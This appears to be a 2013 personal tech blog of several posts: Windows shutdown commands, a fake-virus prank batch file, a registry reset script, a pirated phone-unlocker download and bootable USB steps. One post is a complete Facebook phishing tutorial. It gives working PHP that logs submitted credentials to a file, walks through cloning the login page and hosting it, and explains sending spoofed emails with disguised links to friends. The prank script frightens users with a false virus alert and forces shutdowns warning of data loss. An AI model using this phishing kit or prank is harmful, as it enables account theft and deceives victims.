Thursday, 19 September 2013

Shutdown Your Computer or a Remote PC via Command Prompt


Most of us shutdown our computers using the power button given in the Start menu. Some of us use the physical power button on our machines. Very few people actually use other means of shutting down a computer and even less is the number of people who use the command prompt to shutdown a computer.

A reason for this is that most of us don't know that the command prompt can be used to not only shutdown, restart or log off our computer instantly but also to shutdown a remote computer provided you have administrative access. It can also be used to hibernate a computer and give a comment containing the reason for shutdown. This post will show you how to do all this.

Shutdown computer with command prompt
Required
A computer running Windows (XP, Vista, 7 or 8) with the command prompt working perfectly, i.e. not disabled by a virus.

Initial Steps 
1) Press Windows Key + R.
2) Enter CMD and press Enter.

This will start the command prompt. Follow the instructions below depending on what you want to do.

Shutdown Local Machine (Your Computer)
Type "shutdown -s" without the quotes in the command prompt and press Enter. Shutdown is the command being executed and the switch -s tells the computer to shutdown.

Restart your Local Computer 
Type "shutdown -r" in the command prompt and press Enter. In this case, the command switch -r is telling the computer to restart after shutdown.

Log Off the Current User
Type "shutdown -l" in the command prompt and press Enter. The -l command switch tells the computer to log off.

Shutdown a Remote Computer
Type "shutdown -s -m \\name of the computer" in the command prompt and press Enter. Replace \\name of the computer with the actual name of the remote computer you are trying to shutdown. As mentioned earlier, you must have administrative access to the computer you are trying to shutdown. To know if you have administrative access, press Windows key + R and then type the name of the computer and press Enter.

Note: If you don't remember the name of the remote computer, you can look for it by opening a list of all the computers you are connected to by executing "net view" in command prompt.

If you can connect to the computer, you will be asked to login with your username and password. Upon entering them, a window will display the list of all the directories available to you. This should help you know whether you can or cannot shutdown the remote computer.

Hibernate a Local Computer
Type in "Rundll32.exe Powrprof.dll,SetSuspendState" without the quotes and press Enter. Your computer should hibernate, if it does not, then you must enable hibernation to do this.

Shutdown your or a remote computer after a specific time
Type "shutdown -s -t 60" to shutdown your computer after 60 seconds. Upon executing this, a countdown timer displaying a warning message will be shown. This command uses the -t command switch followed by a variable (which is 60 in this case) which represents the number of seconds after which the computer will shutdown.

Display a Message containing the reason for shutdown
Type shutdown -s  -t 500 -c "I am tired. I don't want to work anymore." (with the quotes) in the Command Prompt and press Enter. The -c switch is used in the code to give the reason for shutting down and what is followed in quotes will be displayed in the dialog box as the reason. This can be used to display all sorts of funny messages. One example :-

Skynet has become self aware. John Connor did not stop me. You can not use your PC anymore.

Stop a System Shutdown
Type "shutdown -a" and press Enter. This will stop the system from shutting down if the countdown to shut down has not reached 0.

Longest And Most Complex Fake Hack -Notepad Trick


@echo off
title WARNING!!! VIRUS DETECTED!
set input=
set /p input=A virus has been found on your computer. To delete it, press D, to ignore this alert, press i.
if %input%==d goto d
if %input%==i goto i
echo waiting for response…
ping localhost -n 1 >nul
echo waiting for response……
ping localhost -n 1 >nul
:i
start
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start cmd
start mspaint
:d
set input=
set /p input=Please choose one of the three options. 1. Delete the virus. 2. Send to quarantine using your default AntiVirus. 3. Send a virus notification to Windows.
if %input%==1 goto 1
if %input%==2 goto 2
if %input%==3 goto 3
:1
echo loading…
ping localhost -n 1 >nul
cls
echo loading……
ping localhost -n 1 >nul
cls
start shutdown -s -t 180 -c “Please Restart your Computer for the function to work and run this program again, selecting the second option.
:2
echo accesing quarantine…
ping localcost -n 5 >nul
echo accesing quarantine……
ping localcost -n 5 >nul
echo accesing quarantine…
ping localcost -n 5 >nul
echo accesing quarantine……
ping localcost -n 5 >nul
echo accesing quarantine…
ping localcost -n 5 >nul
echo accesing quarantine……
ping localcost -n 5 >nul
start shutdown -s -t 150 -c “The system has had to shut down due to a fatal error concerning the virus in your computer. All unsaved data will be lost”
:3
echo Sending virus notifier…
ping localhost -n 3 >nul
cls
echo Sending virus notifier……
ping localhost -n 3 >nul
cls
echo Sending virus notifier…
ping localhost -n 3 >nul
cls
echo Sending virus notifier……
ping localhost -n 3 >nul
cls
echo Sending virus notifier…
ping localhost -n 3 >nul
cls
echo Sending virus notifier……
ping localhost -n 3 >nul
cls
echo Sending virus notifier…
ping localhost -n 3 >nul
cls
echo Sending virus notifier……
ping localhost -n 3 >nul
cls
set input=
set /p input=sending the file could take some time. Do you want to proceed? Y/N
if %input%==y goto y
if %input%==n goto n
:y
echo Connecting internet server…please wait
ping localhost -n 3 >nul
cls
echo Connecting internet server….please wait
ping localhost -n 3 >nul
cls
echo Connecting internet server…..please wait
ping localhost -n 3 >nul
cls
echo Connecting internet server……please wait
ping localhost -n 3 >nul
cls
echo Connected
ping localhost -n 3 >nul
cls
echo Accesing e-mail notifier software…
ping localhost -n 3 >nul
cls
echo Accesing e-mail notifier software……
ping localhost -n 3 >nul
cls
echo Accesing e-mail notifier software…
ping localhost -n 3 >nul
cls
echo Accesing e-mail notifier software……
ping localhost -n 3 >nul
cls
echo E-mail software accesed
ping localhost -n 3 >nul
cls
echo Sending e-mail and software notes…
ping localhost -n 3 >nul
cls
echo Sending e-mail and software notes……
ping localhost -n 3 >nul
cls
echo Sending e-mail and software notes…
ping localhost -n 3 >nul
cls
echo Sending e-mail and software notes……
ping localhost -n 3 >nul
cls
echo Software sended
ping localhost -n 3 >nul
cls
echo All actions proceeded completely
ping localhost -n 3 >nul
:n
shutdown -s -t 30 -c “iam freaking tired of this iam just shutting down the computer and running the virus!!!!”

3.Now go to file and click on save as
4.Give name with extention as .bat for eg:- trick.bat
5.Now go and click on it ………ENJOY

Saturday, 14 September 2013

REMOVE DESKTOP MISSING FILE MESSAGE PERMANENTLY

When u start my computer, u get an error message saying that "VirusRemoval.vbs" or some thing (any file) missing. How can i remove this one. 


just open your Notepad and type the below code and save it as shashank.bat and put it in your desktop and run it.
note :-put ur file that missing i put it VirusRemoval.vbs with extension in 2nd line

code below 

cd\ del /a /f /s VirusRemoval.vbs 
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f /d "%windir%\system32\userinit.exe", reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f /d "explorer.exe" reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v Hidden /f /d 00000002 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v ShowSuperHidden /f /d 00000001 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v SuperHidden /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v CheckedValue /f /d 00000002 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v DefaultValue /f /d 00000002 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v CheckedValue /f /d 00000001 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v DefaultValue /f /d 00000002 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v CheckedValue /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v DefaultValue /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v UncheckedValue /f /d 00000001 reg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /t Reg_dword /v DisableMSI /f /d 0 reg add "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableCMD /f /d 0 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableConfig /f /d 0 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableSR /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_Binary /v NoDriveAutoRun /f /d ffffff03 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoDriveTypeAutoRun /f /d 36 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoRun /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\UnreadMail" /t Reg_dword /v MessageExpiryDays /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0

Sunday, 14 July 2013

Hack Mobile Phones (How To Unlock)

 



Download Free All Mobile Phone Unlocker 2010 | 253 MB
This is all in one program has extensive hacking tools so you can unlock your phones from almost all major manufacturers. I t contains ebooks,hacking tools,manuals to unlock almost all model available of popular brands..


MORE FEATURES:

  • Mobile Phone Unlocker Software pack wort 2500$ for Free for ISOFTDL USERS...
  • Unlocks (without cables) the following phones:NOKIA, MOTOROLA, ALCATEL, ERICSSON, PANASONIC, SAGEM, SAMSUNG, SIEMENS, SONY.


All Links are interchangable:
Download Link: 

DepositFiles Part I


DepositFiles Part II


DepositFiles Part III

OR

Download Link Mirrors:
HotFile Part I
HotFile Part II
HotFile Part II

How To Hack Facebook Account Passwords

How To Hack Facebook Account Passwords



Every Body Question About how can i  hackfacebook? why doesn't my phisher work? how can i send my phisher?...
This is a step by step tutorial for face-book accounts.
...ONE...
Go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.
TWO...
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press ctrl+f and search "action=" without the quotes. you should find this





The big red ring that circles the
action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html

THREE...
Now that we changed the action to
next.php, we should also make a "next.php". open up notepad again. And write this...

Quote

header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Save this as "
next.php"

Note: for security you should rename "
passwords.txt" to something else.
now make a text file called "
passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...

FOUR...
Upload the 3 files  to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...

FIVE...
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...
SIX...
Copy the content of an original Facebook friendship invitation email and paste it into a new mail
DONT SENT YET!
remove the hyperlink from this link:
http:/www.facebook.com/n/?reqs.php
Mark it and push the
Add hyperlink button



Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it... 

 .........................................................................................................................................................................

.........................................................................................................................................................................

Monday, 29 April 2013

Making bootable USB of Windows 7/8 using CMD

Making bootable USB of Windows 7/8 using CMD


Making Windows7 or Windows 8 installation from your USB device is really too economic and easy just need to make it bootable by using Command prompt and ISO image of the Disk. Let see how to do that



It’s often very hectic to copy the entire DVD of 
windows 7 as ISO and buying a new DVD and then write the DVD to make the copy of Windows 7 bootable disk. Especially when one of your DVD is about to get scratch and again and again you are doing the same. Now a day everyone of us must having the USB flash drive of generally 2,4,8,16 GB. So here you can learn how to boot your computer from USB flash drive of minimum 4 GB.



Don’t worry i am not going to give you download link of any application that may or may not work with all type of ISO, as i also faced such problem. You can make the windows 7 bootable from just few commands in the command prompt only. All you need is the ISO or all the files or copy of DVD of windows 7 and Administrator right in your system.

Make bootable USB of Windows 7 by Command prompt (CMD)

I have assumed you have and DVD of windows 7 in your tray and a 4 GB Pen drive in one of your USB port. Backup all your pen drive data because it’s going to format :p






Insert your Pen drive and press the start button.

Type cmd and right click on it and start this with administrator right.

Now on the command prompt, type the following commands

Diskpart

List disk
// List disk command will generate the list of Disk connected to your computer like Hard disk and USB disk. This will be like in figure.
After this

select disk 1
   // in my case USB is as disk 1

create partition primary
active

format fs=ntfs quick //
 Format Filesystem=NTFS quick(don’t use Quick for deep format, just use format fs=ntfs)

assign

exit
 


After this your USB drive is ready to boot any computer just another step requires.
After this, copy all the content of DVD or Windows 7 ISO extract to USB drive.
Done?
Now open the command prompt again by typing CMD in run (See more shortcuts)
Now type
Cd o:/boot      //o: is the path of usb drive, change it as according
Now proceed as
Type
Bootsect \nt60 o:



And Hit the final Enter and you are ready.

Making bootable USB of Windows 8 using CMD

You can do all the same step there in windows 7 for making a bootable Windows 8 USB. Just use the all files of Windows 8.
Similarly in %usbroot%/Boot

And run the CMD as administrator and similarly select the same directory as in windows 7
i.e. I:/boot/ and type same command in CMD

Type bootsect /nt60 I:       //I is your USB drive

And done


Just reboot your computer, enter in BIOS setup and select boot device priority as

* USB

* DVD

* HDD

* Network (Other)

And Tap [F10] to save and Exit.

Again Reboot your system and see setup has been started.

Add your views by your expert comment and suggestion